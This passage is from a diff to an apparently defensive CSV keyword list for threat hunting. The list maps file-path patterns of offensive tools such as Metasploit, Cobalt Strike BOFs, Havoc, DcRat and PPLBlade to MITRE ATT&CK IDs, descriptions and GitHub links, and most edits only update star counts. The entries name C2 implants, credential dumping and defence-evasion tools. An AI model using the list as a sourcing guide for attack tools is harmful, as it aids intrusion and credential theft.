testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/DavRelayUp.git*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" +"*/DavRelayUp/*","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","9","5","448","70","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z" "*/daytime.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dazzleUP.git*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" -"*/db2_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/db2_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/db2-das-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dbc2Loader*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/DCOM Lateral Movement/*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" -"*/dcomhijack.git*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","228","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" +"*/dcomhijack.git*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z" "*/DCOMPotato.git*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" -"*/DcRat.git*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*/DcRat.sln*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*/DcRat.git*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*/DcRat.sln*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*/dcrypt.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" "*/dcrypt_setup.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" -"*/dcsync_*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/dcsync_*.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/DeathStar/DeathStar.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/deb.parrot.sh/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DebugAmsi.git*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" @@ -3282,19 +3290,19 @@ "*/decrypted.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*/deepce.sh *--install*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/defanger.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*/DefaultCreds_db.json*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4664","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*/DefaultCreds_db.json*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" "*/defender-exclusions/*defender*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/defender-exclusions/*exclusion*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/Defense_Evasion.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "*/DelegationBOF/*","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","10","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*/DelegationBOF/*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*/deluge-rpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1321","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*/demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "*/demo_bof.c*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" -"*/demon.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/demon.x64.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/demon1.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/demosyscalls.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/demon.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/demon.x64.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/demon1.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/demosyscalls.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*/Dendrobate.git*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/Dendron.bin*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/Dendron.csproj*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" @@ -3305,28 +3313,29 @@ "*/Dent/Loader*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*/DesertFox/archive/*.zip*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*/detail/kali-linux/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/detect_antivirus/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" 